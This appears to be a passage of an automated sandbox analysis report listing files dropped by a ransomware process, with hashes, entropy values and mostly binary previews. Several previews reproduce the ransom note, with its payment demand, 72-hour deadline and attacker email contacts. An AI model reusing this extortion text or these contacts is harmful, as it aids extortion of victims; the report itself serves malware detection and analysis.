                                                                                                                                            Preview:..E.O.amU.^..;.w@....X.]...3j.*....$.:WX..8.}.:../}.B.M...ai.G..n..F.. c.......y..u1..o.2..ejk)L.?z.\p..}.<...ff.6..jg.]....w;.I...?g...HN2.>.....g...%D{..;.........-_,....Ou....\.$..^x....`V..8...h..,..Y.N.S...Y..E#.L:.3M.g..U.f..|.*P..S....J......!.aQ..Z..#.c..?[..H.ypz..]C...nm4!.$RN...Y.?I.<...."'z.N.mr].i...x..Lc...Y.a w.o.!..n.. ...1Z.?.....}p^r..T&....f..../..5(..'.q..P0x...*.n....{..^:7....VE.7fa{_...d...5.t...&H....5.......c.iG/.r0?...j..{...H.?..e.$.LN../0rt.N..B....'..8$..*.=...tu.M/...-..td..P..i.....z..q.Y..k.'...A.}..a&..S..E.<@..Qw.M.X.....%..xAxleR\..|.FN.6.^...C.qb...7..g..qL.P....lK..._..C...}...w..=...?...V..x...uU._.(.....g..../|.x.7W.v.qP.4A.^n.M.3..s.H.5...L...s....O.?b.p]5M.t........Y1..z....Mb..!..UkB..4..'.hC.....2/..:.}..)f..1..'./7e.l...?d....i...S.....B0wG.zG.o..q.6%...P,,..L.>.{.>.......sKey":""}]}=...g..iN.9...^..#.....,&.....y.W.U.I..Q....4..d..C.k...LS.......q....u-.....*..C9...-.W..m.O.Q.#ld2..(.<&..rn/..]...4
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):262410
                                                                                                                                            Entropy (8bit):0.2933334160116456
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:RRiBiKEJAeLr3T8RxzUZyeNpP7sqBWggcU0rifNBfMfcedtMgl+AjluX1t:RMLyAeXQiZyYt7sqB/TGffZITHjY
                                                                                                                                            MD5:39D169F89239C921815724F2CF52248F
                                                                                                                                            SHA1:82CA26B260F0DDE2804F53C457EA915BB795D093
                                                                                                                                            SHA-256:8C9BD5E927277EC9C5112793D896D32A56422A79503AD95020A869E698D3AC0D
                                                                                                                                            SHA-512:9353F02DEB6C3B2CD902823385D4EF4E7C43B77A934167DC37CBA332509BE9B3BDD3B2E6B383B3570D4869BB952F493B42AFA2859EADE633F152E19A0934722A
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:....E........{B..5O.'...>.hI;_.....UU'........q.f./.P..[.........y/^.X.G."~...E.X...`...C..[+}Q....o...Y.{.......>.'.....LO...f.c...3s.l..H.._JSt-(..{h.9.:.J...&>...K..G........]..b.....j..e.Uqn..i..Pr..j...c.....sX.a.`_..0..........kj..8sl..8.\...R@.<m...IZa+.bQQl.U<.%..T)e..r".W5BNi.;.P.s..?.N.3.U.". y...I.+.Y9...5/...\.H...*......I..+ddo..j,c.....s..T.qO...J.a./.e.Z..W..a9'~....5..J.{....6J...b.P...]=Q...l.....z/3..37.$...r1.......[>]rT..xB,!..}.PU5_.5N..|ID....f.*0MR...z.., ..3.4.....G.kay.<.!..^S.i..l!...vM..c......\Yw.g6T.....7Wn.y...S.{........Ir....p...*.S....Y.)-...4.6.....:fI.K...Y8.h..<.......B........x}.y.../....7t=.1|..`..E........T]..W0..:o<.......C"..Z;w8..y..lBV..V$j...p......]I...etd..b.../......o...W.SP...=|....b........lQ.....f..U.9...I..ayZ.K..m.c.S..%.$....!..........P.......d.j.Z...{ ..x.7....b......^.i..N.D~..'~no8.^..;..y.e.)8.+............%...<1.."a....o...:. .`.mh..A|...z.e.....*`..d.Kt...3.x....iF.....#..G.......@.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):262410
                                                                                                                                            Entropy (8bit):0.2933334160116456
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:RRiBiKEJAeLr3T8RxzUZyeNpP7sqBWggcU0rifNBfMfcedtMgl+AjluX1t:RMLyAeXQiZyYt7sqB/TGffZITHjY
                                                                                                                                            MD5:39D169F89239C921815724F2CF52248F
                                                                                                                                            SHA1:82CA26B260F0DDE2804F53C457EA915BB795D093
                                                                                                                                            SHA-256:8C9BD5E927277EC9C5112793D896D32A56422A79503AD95020A869E698D3AC0D
                                                                                                                                            SHA-512:9353F02DEB6C3B2CD902823385D4EF4E7C43B77A934167DC37CBA332509BE9B3BDD3B2E6B383B3570D4869BB952F493B42AFA2859EADE633F152E19A0934722A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....E........{B..5O.'...>.hI;_.....UU'........q.f./.P..[.........y/^.X.G."~...E.X...`...C..[+}Q....o...Y.{.......>.'.....LO...f.c...3s.l..H.._JSt-(..{h.9.:.J...&>...K..G........]..b.....j..e.Uqn..i..Pr..j...c.....sX.a.`_..0..........kj..8sl..8.\...R@.<m...IZa+.bQQl.U<.%..T)e..r".W5BNi.;.P.s..?.N.3.U.". y...I.+.Y9...5/...\.H...*......I..+ddo..j,c.....s..T.qO...J.a./.e.Z..W..a9'~....5..J.{....6J...b.P...]=Q...l.....z/3..37.$...r1.......[>]rT..xB,!..}.PU5_.5N..|ID....f.*0MR...z.., ..3.4.....G.kay.<.!..^S.i..l!...vM..c......\Yw.g6T.....7Wn.y...S.{........Ir....p...*.S....Y.)-...4.6.....:fI.K...Y8.h..<.......B........x}.y.../....7t=.1|..`..E........T]..W0..:o<.......C"..Z;w8..y..lBV..V$j...p......]I...etd..b.../......o...W.SP...=|....b........lQ.....f..U.9...I..ayZ.K..m.c.S..%.$....!..........P.......d.j.Z...{ ..x.7....b......^.i..N.D~..'~no8.^..;..y.e.)8.+............%...<1.."a....o...:. .`.mh..A|...z.e.....*`..d.Kt...3.x....iF.....#..G.......@.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):98570
                                                                                                                                            Entropy (8bit):0.6736018204717928
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:Jam63fxfRtGMsp9QFcf6qzeg4ZQKlGxFxFdSt:E73fxfjGuMeg4ZQFFxFwt
                                                                                                                                            MD5:A855BD1E171739F1ACB68D7006FCB80B
                                                                                                                                            SHA1:6B5ED1A99421C5745813D534446D156B28E3A5D2
                                                                                                                                            SHA-256:39A02CEDA65F158247CF63E256CCB7CD07938785FF7D57CAD2D9DF9AB30932D3
                                                                                                                                            SHA-512:BE36F418E0AB7B02D1640F1DD58641AA3ABBEFE724BDE8A85A48FC57C13C114BE54CE2E62FB6401E21FA582C6E16388C03FA80B9A23C16750577EE2DE4CC292D
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:..:D...I(.P..|..wST.T]..q...~.&...uS..n..39.<Y...Y.5.........G...d..<f.I.8......yG.q`|U.x..f$....!.X&..9..\.w. .w......3_}.,>...V..IZ..Fh$..K..@.U..7...Q...qH.^.......!]......_U.!#.......w...m.@^?..G..i.8...d.g..E..|.4l.Y...`.bT=.Asp{.4./6._.=......k..U~.'....*+.7.K.Nd.7,#.&$...d<.,.u.U..@......zb.....+Xn....b..DL..P3>......m.`U[&.r..7am.m..r...0.G.9R.?l.R.NH..g.F...#5..}1....:C..f.A!^x.$....I..T..;..b..fC......j....a%..^..W.'Cd....QV{t.1L..Hva.......<.c>%...Y..].....sD.-.2.&.......Z.e.k..;f>....X......".....9bF..._w:...a.._..5../-...'.2(4 {$.+B..Es,.....Eh..P....x.-h..ki......+)Px.8.....?a...8I}..n.2~.S.........Du.....Sx.9...U@.&C.........dO..{N.l.0s......QP..pt......P...w.|N.{.Gm..4:L.ZM....].;,........h..:5n/.!L.Q.!.....dm=.o..T.\.....G.^V.E.{...K.7v....*{....qF....f..N2..=.@........T..L.#.4Q...B..Y.R3.& ......`.IL>:i....\.\<.5?..".Q.:?.. 6.".o...c.... .U@i..z<.fIwn/.7..g..<.7=.+......s..1..u{.`..7.....$.o....t.>....OD.}`.G...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.608426476156292
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:m0aaPxjvxIRRP999POasE8jnsxckXR/5D+LdEEp/MwdL:mHaJzx4XckPD4L
                                                                                                                                            MD5:2D655A16D3C10D68FAD7B5A3356BA2E1
                                                                                                                                            SHA1:4EA8A2243DFC8ADB20E4E350FD6738E508514BEC
                                                                                                                                            SHA-256:4DE1278117B25993580D0C14E5C53A00BDE4F598C41CA1CE6B0051F14CDDAE9B
                                                                                                                                            SHA-512:90602DC8BB6B3E67E3CB52767503DA75666F66B8E3EA6614B7FC9CFE1DC3775E596441E2166983F9153BF537A099686E7C312F8CE4D79326B81214E009A55F5E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.+.}.....S....Zu.i.X.....R>J...cO..|....>..=n...f......-~.8..M..lK....|.U...o..2)...........-....k...v..6.K.b.y.-.y#...s0(.|....S.%h..bn..\.u..a...F....`......q.D../k7.7.................syT;.M.n.....X>...@ru.q.p.6d.V......4.7.\;....m..".>.k..S5.5e..@.d...N.Af....w..P.1.QA..+._l...=../a.:8......Oi..ivK:....(9c.r9.+x.....a&.>..-8K~3.&i.Q...ma..;S...c.s.V...O.....E.]..\.. M.-...`.l.H..{#P.......{....P.h....`I..x...h.;<:.76VJn.....@.?.9.....B.".>.Q..z\.....6....h.$...o....%`.E...a..>L..K...h.[X!9`vZ..W..p.^..p.+n.]x...1X.V...jXjCs...[....4n........jC.c.:.-.....h......U.lAln.......*<}..(:..m....e8Q.8..)...#.KR!y.U..$.AB.qf.%.O9.Am.u]|.....y{e...]...h.....R...3..>....a...........5.b.[..o.)Gc#..a..-5....NP..9f|.N.j..8E.[.U......i.......Z/....7....\.BUJ|....3|..>Gy@s.....p.a...........R....1!.d.,...N8.Q]CO!..Z.t.j.\.y.V.._....s.h}+.#...h..RB....g.%....{.Y<.\4.K........y...f.g~..ru.....[.-..*..A.}.G....;$.n/.==Qc}.h....\.KC7.I....Q.a..h...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.608426476156292
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:m0aaPxjvxIRRP999POasE8jnsxckXR/5D+LdEEp/MwdL:mHaJzx4XckPD4L
                                                                                                                                            MD5:2D655A16D3C10D68FAD7B5A3356BA2E1
                                                                                                                                            SHA1:4EA8A2243DFC8ADB20E4E350FD6738E508514BEC
                                                                                                                                            SHA-256:4DE1278117B25993580D0C14E5C53A00BDE4F598C41CA1CE6B0051F14CDDAE9B
                                                                                                                                            SHA-512:90602DC8BB6B3E67E3CB52767503DA75666F66B8E3EA6614B7FC9CFE1DC3775E596441E2166983F9153BF537A099686E7C312F8CE4D79326B81214E009A55F5E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.+.}.....S....Zu.i.X.....R>J...cO..|....>..=n...f......-~.8..M..lK....|.U...o..2)...........-....k...v..6.K.b.y.-.y#...s0(.|....S.%h..bn..\.u..a...F....`......q.D../k7.7.................syT;.M.n.....X>...@ru.q.p.6d.V......4.7.\;....m..".>.k..S5.5e..@.d...N.Af....w..P.1.QA..+._l...=../a.:8......Oi..ivK:....(9c.r9.+x.....a&.>..-8K~3.&i.Q...ma..;S...c.s.V...O.....E.]..\.. M.-...`.l.H..{#P.......{....P.h....`I..x...h.;<:.76VJn.....@.?.9.....B.".>.Q..z\.....6....h.$...o....%`.E...a..>L..K...h.[X!9`vZ..W..p.^..p.+n.]x...1X.V...jXjCs...[....4n........jC.c.:.-.....h......U.lAln.......*<}..(:..m....e8Q.8..)...#.KR!y.U..$.AB.qf.%.O9.Am.u]|.....y{e...]...h.....R...3..>....a...........5.b.[..o.)Gc#..a..-5....NP..9f|.N.j..8E.[.U......i.......Z/....7....\.BUJ|....3|..>Gy@s.....p.a...........R....1!.d.,...N8.Q]CO!..Z.t.j.\.y.V.._....s.h}+.#...h..RB....g.%....{.Y<.\4.K........y...f.g~..ru.....[.-..*..A.}.G....;$.n/.==Qc}.h....\.KC7.I....Q.a..h...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.066945949970845
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:vkXpiglecqjFvxvyZTL8xZdvjkqU1gl8qJjWpSvaZ5PZ17+smN0F6mHn:vEiIe3xpsTL8Fjc1gl8yycCZ1f7+DEDH
                                                                                                                                            MD5:70B180B702CB322644AD7146CEF8E7C4
                                                                                                                                            SHA1:643A1124D599E5A76B34AFE5602DE1B762610146
                                                                                                                                            SHA-256:BD59D9625BC7D647CD39EC2D15B75D22AFC7124B118FC17725115F1B3DDC0F3E
                                                                                                                                            SHA-512:742FBD6ADD5C561BCD551B38D77F8C3D53A987F291DC5603FE46F2C6AC20B0F32C5F54FC136540F55EA2D4B2F8FBA126F485D3724FEDC1F38D501D57D4F8B473
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:g^......i,7..n............-j)..K....._....i..>..F.a..!...AZ....9/.3Z$'.O....S.v.....r..u.v.(.g..i.n..Y.tN.k..>..f.m..Ze..T^.......Q4gR.4.....e.Vg.L$a..vb;.PRPM.3Z..wLM..,V!BZh..lF.B.g...3.....o%.4...i..i.?jz8..bz..8.....A&.i.L'......o..L471..q..G(...0..w....Q@.)..F.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):98570
                                                                                                                                            Entropy (8bit):0.6736018204717928
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:Jam63fxfRtGMsp9QFcf6qzeg4ZQKlGxFxFdSt:E73fxfjGuMeg4ZQFFxFwt
                                                                                                                                            MD5:A855BD1E171739F1ACB68D7006FCB80B
                                                                                                                                            SHA1:6B5ED1A99421C5745813D534446D156B28E3A5D2
                                                                                                                                            SHA-256:39A02CEDA65F158247CF63E256CCB7CD07938785FF7D57CAD2D9DF9AB30932D3
                                                                                                                                            SHA-512:BE36F418E0AB7B02D1640F1DD58641AA3ABBEFE724BDE8A85A48FC57C13C114BE54CE2E62FB6401E21FA582C6E16388C03FA80B9A23C16750577EE2DE4CC292D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..:D...I(.P..|..wST.T]..q...~.&...uS..n..39.<Y...Y.5.........G...d..<f.I.8......yG.q`|U.x..f$....!.X&..9..\.w. .w......3_}.,>...V..IZ..Fh$..K..@.U..7...Q...qH.^.......!]......_U.!#.......w...m.@^?..G..i.8...d.g..E..|.4l.Y...`.bT=.Asp{.4./6._.=......k..U~.'....*+.7.K.Nd.7,#.&$...d<.,.u.U..@......zb.....+Xn....b..DL..P3>......m.`U[&.r..7am.m..r...0.G.9R.?l.R.NH..g.F...#5..}1....:C..f.A!^x.$....I..T..;..b..fC......j....a%..^..W.'Cd....QV{t.1L..Hva.......<.c>%...Y..].....sD.-.2.&.......Z.e.k..;f>....X......".....9bF..._w:...a.._..5../-...'.2(4 {$.+B..Es,.....Eh..P....x.-h..ki......+)Px.8.....?a...8I}..n.2~.S.........Du.....Sx.9...U@.&C.........dO..{N.l.0s......QP..pt......P...w.|N.{.Gm..4:L.ZM....].;,........h..:5n/.!L.Q.!.....dm=.o..T.\.....G.^V.E.{...K.7v....*{....qF....f..N2..=.@........T..L.#.4Q...B..Y.R3.& ......`.IL>:i....\.\<.5?..".Q.:?.. 6.".o...c.... .U@i..z<.fIwn/.7..g..<.7=.+......s..1..u{.`..7.....$.o....t.>....OD.}`.G...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4126
                                                                                                                                            Entropy (8bit):7.956826227733033
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:ouDijq3hR1wlzvos+4nmHZFZ/A016EXFWH+vmuJ5coVoqNf:bDijq3hvMb+4nGZFS01ZEk59f
                                                                                                                                            MD5:6CBF751F195644412B7FC98D448F425B
                                                                                                                                            SHA1:E89ECCB561ADAAC4E31F2C60C56FD869F4C724F6
                                                                                                                                            SHA-256:8B7B732BE2E48DCEF1C32FBA8BF3F54CE48271B358FF5DEF7E04E4B859C99A7D
                                                                                                                                            SHA-512:2D2586ADEF9BF0B235A2A02B70B2C316E1B864D675AC50D0D7953E86B86515665451D0FC05E321FA8555E65D73325041066D6178B0738169A232AB5BEB14947F
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:R2.......;.L..by..Z|Q.~.....|..U....Oj.S..;...........2._7>.G..G....>.$..+.K......~.?.G...7..0..l..#`...V..vc......_...O..|....N.C..Y..\.F...3H%.....W..>o.R.L...T@.U\..X...3.ko .(......FU...ZJ.ot+.S.q.$^.jOhO..z..mD......s.{.Wv.m.......x....S'e..Wv.j..0.6...Yk.xt."..a..l.Ue.U.y.Ig.B..2&..m..&.B.`F...i....^s.7...w.w..Dm.?.(."......t....K.CK...9j...._..C.#..[/X.mo.`L...V.!..X.....[.[_-.....+........l........xU...g.4.........KWb.%...F..e....'..`..v?d;....+......)./.Q .kMDc........]{.%D......'.-...f....!g.S..y...j.........p.0.`i..{#f.......x.-.=..^.p"w.j..uP6..\"v....2;o....<...;....Gwe.U..].hz.....'...y...wiT...$.v...k&....rq...R.`3l....Y... =i...o=T...h......4.....:...&!...,.G..7..3.c.Yd.p.v...gp-N.jJ...z.q.@.._..:.M....g.6...I........%d.?.).:.s}x.x...1M...j...*..d.G............Q.-.Z.R.lya`.`.r.*..j}../...r..7]....i....R...n..@@....5C5$..}`."X.., .v.|....9.=..].C..#o...\...{kn!...@z..........x8/...0.U.m.2...Tq..U..J....e./p.F...F...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4126
                                                                                                                                            Entropy (8bit):7.956826227733033
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:ouDijq3hR1wlzvos+4nmHZFZ/A016EXFWH+vmuJ5coVoqNf:bDijq3hvMb+4nGZFS01ZEk59f
                                                                                                                                            MD5:6CBF751F195644412B7FC98D448F425B
                                                                                                                                            SHA1:E89ECCB561ADAAC4E31F2C60C56FD869F4C724F6
                                                                                                                                            SHA-256:8B7B732BE2E48DCEF1C32FBA8BF3F54CE48271B358FF5DEF7E04E4B859C99A7D
                                                                                                                                            SHA-512:2D2586ADEF9BF0B235A2A02B70B2C316E1B864D675AC50D0D7953E86B86515665451D0FC05E321FA8555E65D73325041066D6178B0738169A232AB5BEB14947F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:R2.......;.L..by..Z|Q.~.....|..U....Oj.S..;...........2._7>.G..G....>.$..+.K......~.?.G...7..0..l..#`...V..vc......_...O..|....N.C..Y..\.F...3H%.....W..>o.R.L...T@.U\..X...3.ko .(......FU...ZJ.ot+.S.q.$^.jOhO..z..mD......s.{.Wv.m.......x....S'e..Wv.j..0.6...Yk.xt."..a..l.Ue.U.y.Ig.B..2&..m..&.B.`F...i....^s.7...w.w..Dm.?.(."......t....K.CK...9j...._..C.#..[/X.mo.`L...V.!..X.....[.[_-.....+........l........xU...g.4.........KWb.%...F..e....'..`..v?d;....+......)./.Q .kMDc........]{.%D......'.-...f....!g.S..y...j.........p.0.`i..{#f.......x.-.=..^.p"w.j..uP6..\"v....2;o....<...;....Gwe.U..].hz.....'...y...wiT...$.v...k&....rq...R.`3l....Y... =i...o=T...h......4.....:...&!...,.G..7..3.c.Yd.p.v...gp-N.jJ...z.q.@.._..:.M....g.6...I........%d.?.).:.s}x.x...1M...j...*..d.G............Q.-.Z.R.lya`.`.r.*..j}../...r..7]....i....R...n..@@....5C5$..}`."X.., .v.|....9.=..].C..#o...\...{kn!...@z..........x8/...0.U.m.2...Tq..U..J....e./p.F...F...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4532
                                                                                                                                            Entropy (8bit):7.958828751811753
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:ui4+cXDQb0V16SH/gDlmraoynW0GcHoOw5lYaaKGMZdMxxO:fjI0b0V1tH/gDlYry53HVuBrQO
                                                                                                                                            MD5:9E0A6C933AE224C0C4121833C8AFC68A
                                                                                                                                            SHA1:F549A8D36817B54505287E35B1D582C16E1BE4B6
                                                                                                                                            SHA-256:E4DD6190DA2787B0D86FD661EE2059C15E56C21AA145E018CBC9DC86DB8E562D
                                                                                                                                            SHA-512:48532D60C6837B06DCF1A9DB96356B25378F02578C29A6A3324BFF27CF54E6CC6BDD0C0D90187F4C75BED98C76F4D5E0C6D022D9464B75E42920C06652474F21
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:F.t.h...|.i.....&n~.x.k@....G.7d.2|.;.v.X.e....8..V..PG.7.n".}...Q..._....2!...;..o...@e.c....(,.....&.W....qb&=.[...!...v.[.!..Pm.f%t|......\Z/....K..F/..o.r........X...[.e[.j].......I....W....]......wA..wL.Y..J..."..V2K.CJ....:.$`-.P.Bp..+.. Q.r..^..m.E..5.Se$.......Y.[.R..(...6M..u'..~">.Rm.R...i8Q-..../.?..`/....Rl......v7Jrg.T.X.A.....Np.\S..............^..-9&.c.C.^.....1E~T.`...W.f.@/$O..[t|+T.E..{<....@....@.....e.r..x...S#.41.79"..\............ET...W..`Rp....@..f....1.hO.9$6.Z....I.n...q%E."...q.,...X3.?(....B.d.ja.q...X/...H...y....:.......1b..'.?...58$.Sz(y....h.........H...)....g.]ZLq.^..\....d.osx...x..Y.:'AGO."...Omp...A.:....X.h.|..H`...b.H]..<...h.&lP...).... .B.h.9..(...N.;........._.V......3k .........L...._.....x..5.j|..U.]..F..[..p..8Sc..0...G..`.6Z..!t1...^.p.....Y\].^.......z~f.Hf.0].$.`.z.&A:..=.i...."....K.5/..T.....L.....fNA_)...g*2.....p.|....>>p|q%.Z|..W.^.E..~7.tlhxh..Fyh.....i.c.6.-'R./.NrK.o.......,T..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4532
                                                                                                                                            Entropy (8bit):7.958828751811753
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:ui4+cXDQb0V16SH/gDlmraoynW0GcHoOw5lYaaKGMZdMxxO:fjI0b0V1tH/gDlYry53HVuBrQO
                                                                                                                                            MD5:9E0A6C933AE224C0C4121833C8AFC68A
                                                                                                                                            SHA1:F549A8D36817B54505287E35B1D582C16E1BE4B6
                                                                                                                                            SHA-256:E4DD6190DA2787B0D86FD661EE2059C15E56C21AA145E018CBC9DC86DB8E562D
                                                                                                                                            SHA-512:48532D60C6837B06DCF1A9DB96356B25378F02578C29A6A3324BFF27CF54E6CC6BDD0C0D90187F4C75BED98C76F4D5E0C6D022D9464B75E42920C06652474F21
                                                                                                                                            Malicious:false
